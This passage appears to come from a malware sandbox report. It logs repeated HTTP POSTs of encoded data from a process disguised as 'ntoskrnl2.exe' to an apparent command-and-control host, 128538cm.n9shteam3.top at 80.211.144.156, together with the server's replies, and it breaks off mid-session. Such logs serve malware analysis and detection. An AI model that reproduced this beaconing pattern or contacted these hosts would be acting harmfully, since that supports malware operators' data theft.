                                                            Sep 2, 2024 13:34:12.408005953 CEST346OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1340
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            33192.168.2.64977980.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:12.464140892 CEST346OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1024
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Sep 2, 2024 13:34:12.821892023 CEST1024OUTData Raw: 50 53 5a 56 5b 46 59 53 5b 5f 56 5a 57 5d 50 53 55 58 5e 44 50 5f 5a 5f 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PSZV[FYS[_VZW]PSUX^DP_Z_YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\''W9^<(4'"%>5(=$\/4',W+8>'4>1-*%^./]+
                                                            Sep 2, 2024 13:34:13.129128933 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:13.334731102 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:12 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            34192.168.2.64978180.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:13.735207081 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:14.152096987 CEST1028OUTData Raw: 50 56 5f 56 5e 45 5c 50 5b 5f 56 5a 57 55 50 5d 55 58 5e 44 50 5f 5a 5f 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PV_V^E\P[_VZWUP]UX^DP_Z_YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'['19_?(('1_%=9<[(/$\$Z!*+/*77>1*X:%^./]+
                                                            Sep 2, 2024 13:34:14.400244951 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:14.608207941 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:13 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            35192.168.2.64978280.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:14.768434048 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:15.118554115 CEST1028OUTData Raw: 55 50 5f 56 5e 45 59 5d 5b 5f 56 5a 57 5c 50 5a 55 59 5e 49 50 5e 5a 5b 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UP_V^EY][_VZW\PZUY^IP^Z[YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'Z$-+8+_$T)0.2_+$\/Z0<=+;<='?)1)-%^./]+,
                                                            Sep 2, 2024 13:34:15.414674044 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:15.541254997 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:14 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            36192.168.2.64978380.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:15.695557117 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:16.040728092 CEST1028OUTData Raw: 55 51 5a 55 5b 41 5c 51 5b 5f 56 5a 57 5e 50 58 55 5a 5e 45 50 5a 5a 5a 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UQZU[A\Q[_VZW^PXUZ^EPZZZYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\''"-^(;7X'"1Y$>(>8^-7 &<*(> X*1:::%^./]+$
                                                            Sep 2, 2024 13:34:16.370728016 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:16.501729012 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:15 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            37192.168.2.64978480.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:16.689224958 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:17.040508986 CEST1028OUTData Raw: 50 56 5a 53 5e 43 5c 56 5b 5f 56 5a 57 5f 50 5f 55 5a 5e 41 50 5b 5a 5f 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PVZS^C\V[_VZW_P_UZ^AP[Z_YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'X3"1=+#$1"'.?=#/X&<.+*7+*1.:*%^./]+
                                                            Sep 2, 2024 13:34:17.342374086 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:17.466954947 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:16 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ
                                                            Sep 2, 2024 13:34:17.490564108 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1340
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:17.709374905 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:17.709600925 CEST1340OUTData Raw: 50 55 5f 55 5e 45 59 52 5b 5f 56 5a 57 58 50 59 55 50 5e 49 50 5c 5a 5b 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PU_U^EYR[_VZWXPYUP^IP\Z[YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$02+'1)_0.5<-;;'*8,P*'?25:*%^./]+<
                                                            Sep 2, 2024 13:34:18.018712044 CEST308INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:17 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 152
                                                            Connection: keep-alive
                                                            Data Raw: 03 1e 23 0b 22 34 0e 0d 31 5d 2c 10 2b 39 21 01 28 13 34 06 39 01 3b 05 27 07 3c 01 2b 32 31 56 31 39 3e 03 2a 12 2e 03 3c 0c 03 54 22 1e 20 5b 03 1f 25 5e 23 21 32 54 25 01 3a 04 24 27 29 05 36 09 24 5d 28 3d 26 18 25 2e 24 5b 37 1f 26 1f 3b 13 08 52 31 16 38 5e 2d 2f 36 5f 32 3e 2a 56 08 16 3b 08 3f 5a 39 00 37 27 38 04 21 2b 3d 54 20 35 37 52 33 0d 2b 52 27 29 2d 11 33 10 2f 1c 3e 13 23 15 27 29 25 14 20 1d 2d 51 2d 13 24 50 2e 02 2d 56 03 30 57 53
                                                            Data Ascii: #"41],+9!(49;'<+21V19>*.<T" [%^#!2T%:$')6$](=&%.$[7&;R18^-/6_2>*V;?Z97'8!+=T 57R3+R')-3/>#')% -Q-$P.-V0WS


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            38192.168.2.64978580.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:17.621836901 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:17.977956057 CEST1028OUTData Raw: 55 54 5f 53 5b 45 59 57 5b 5f 56 5a 57 5a 50 52 55 5d 5e 43 50 5e 5a 5b 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UT_S[EYW[_VZWZPRU]^CP^Z[YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$0W2<^43T=Z$&^+.</05W+^,*$(>">X.%^./]+
                                                            Sep 2, 2024 13:34:18.266612053 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:18.473316908 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:17 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            39192.168.2.64978680.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:18.785686016 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1024
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:19.134208918 CEST1024OUTData Raw: 50 56 5f 52 5b 42 59 55 5b 5f 56 5a 57 5d 50 5b 55 5f 5e 45 50 5f 5a 58 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PV_R[BYU[_VZW]P[U_^EP_ZXYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$$11=8439Z%>^(>?8$4&<=?;/>$X>-*%^./]+,
                                                            Sep 2, 2024 13:34:19.431430101 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:19.557398081 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:18 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            40192.168.2.64978780.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:19.978192091 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:20.337307930 CEST1028OUTData Raw: 55 52 5a 56 5e 42 59 5d 5b 5f 56 5a 57 54 50 5f 55 50 5e 41 50 59 5a 58 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: URZV^BY][_VZWTP_UP^APYZXYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'^$1X?^83X32Y?>$_-74[$,%W(;3*$X)=-:%^./]+
                                                            Sep 2, 2024 13:34:20.614392042 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:20.737283945 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:20 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            41192.168.2.64978880.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:20.876718998 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:21.228434086 CEST1028OUTData Raw: 55 5f 5a 53 5e 41 5c 54 5b 5f 56 5a 57 58 50 59 55 50 5e 49 50 59 5a 5a 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: U_ZS^A\T[_VZWXPYUP^IPYZZYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'^$!9_<++$1"0=6\?,/(\3,?;8T=4#=/:%^./]+<
                                                            Sep 2, 2024 13:34:21.525141001 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:21.737664938 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:21 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            42192.168.2.64978980.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:21.878649950 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:22.228097916 CEST1028OUTData Raw: 50 54 5f 52 5e 44 5c 51 5b 5f 56 5a 57 54 50 53 55 5b 5e 46 50 5a 5a 5c 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PT_R^D\Q[_VZWTPSU[^FPZZ\YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$0)^<;+Y'T%[3>_+([84<0!V*80Q)' Y*2:X-%^./]+
                                                            Sep 2, 2024 13:34:22.527647972 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:22.653923035 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:21 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            43192.168.2.64979080.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:23.595801115 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1312
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:23.946706057 CEST1312OUTData Raw: 55 5f 5a 51 5e 40 59 56 5b 5f 56 5a 57 5c 50 5f 55 5a 5e 40 50 5a 5a 51 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: U_ZQ^@YV[_VZW\P_UZ^@PZZQYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'$1<^4'2$-&Y<-8^, &/%U?(=';?">.%^./]+,
                                                            Sep 2, 2024 13:34:24.259706974 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:24.499011040 CEST308INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:23 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 152
                                                            Connection: keep-alive
                                                            Data Raw: 03 1e 23 0b 23 42 2f 55 31 38 23 07 29 5f 2e 5b 28 03 3b 1d 3a 11 23 00 27 39 01 5a 2b 32 26 08 31 39 00 05 3d 02 08 01 2b 32 00 0f 21 24 20 5b 03 1f 25 16 20 22 08 1e 26 28 3e 01 30 09 2d 00 36 37 0d 05 3e 03 26 51 30 2e 38 11 37 1f 31 0c 2d 3e 31 0e 31 16 05 06 3a 3c 3d 05 31 3e 2a 56 08 16 38 56 28 2f 26 5c 20 24 23 12 23 5e 3d 1f 34 35 24 0b 24 33 28 0e 27 14 29 54 27 00 3b 50 29 3d 2b 5f 24 29 31 5a 23 55 21 54 3a 39 24 50 2e 02 2d 56 03 30 57 53
                                                            Data Ascii: ##B/U18#)_.[(;:#'9Z+2&19=+2!$ [% "&(>0-67>&Q0.871->11:<=1>*V8V(/&\ $##^=45$$3(')T';P)=+_$)1Z#U!T:9$P.-V0WS


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            44192.168.2.64979180.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:23.637940884 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:23.996737003 CEST1028OUTData Raw: 50 52 5a 54 5e 45 5c 53 5b 5f 56 5a 57 5e 50 58 55 5b 5e 45 50 5e 5a 5e 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PRZT^E\S[_VZW^PXU[^EP^Z^YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$01:<($!9%-%<_8$$Z&?5S?;<W=4$Z?!:Y:*%^./]+$
                                                            Sep 2, 2024 13:34:24.310518980 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:24.527663946 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:23 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            45192.168.2.64979280.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:24.657411098 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:25.009516001 CEST1028OUTData Raw: 55 55 5f 51 5e 40 5c 57 5b 5f 56 5a 57 5e 50 5c 55 5d 5e 45 50 5c 5a 58 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
